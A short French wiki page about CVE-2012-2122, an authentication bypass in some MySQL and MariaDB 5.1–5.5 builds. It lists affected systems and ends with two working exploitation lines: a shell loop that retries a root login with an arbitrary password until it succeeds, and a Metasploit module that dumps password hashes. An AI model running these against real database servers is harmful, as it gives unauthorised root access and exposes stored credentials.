Mysql faille

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
CVE CVE-2012-2122
Type Contournement d'authentification
Cause Comparaison de hash de mot de passe defaillante
Cibles MySQL / MariaDB 5.1.x - 5.5.x (certaines builds)

CVE-2012-2122 est une faille de contournement d'authentification de MySQL/MariaDB : sur les versions vulnerables, une comparaison de token erronee fait qu'une meme tentative de connexion finit statistiquement par etre acceptee. En repetant la connexion avec un mot de passe quelconque, le compte root finit par s'ouvrir.

Présentation

Les systèmes suivants sont concernés :

  • Ubuntu 64-bit (10.04, 10.10, 11.04, 11.10, 12.04)
  • OpenSuSE 12.1 64-bit MySQL 5.5.23-log
  • Debian Unstable 64-bit 5.5.23-2
  • Fedora 16
  • Arch Linux
  • MySQL et MariaDB en version 5.1.61, 5.2.11, 5.3.5 et 5.5.22 de façon générale
  • au bout de 30 secondes le compte root s'ouvre.
# while /bin/true; do mysql -u root --password=123; done

ou

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

Voir aussi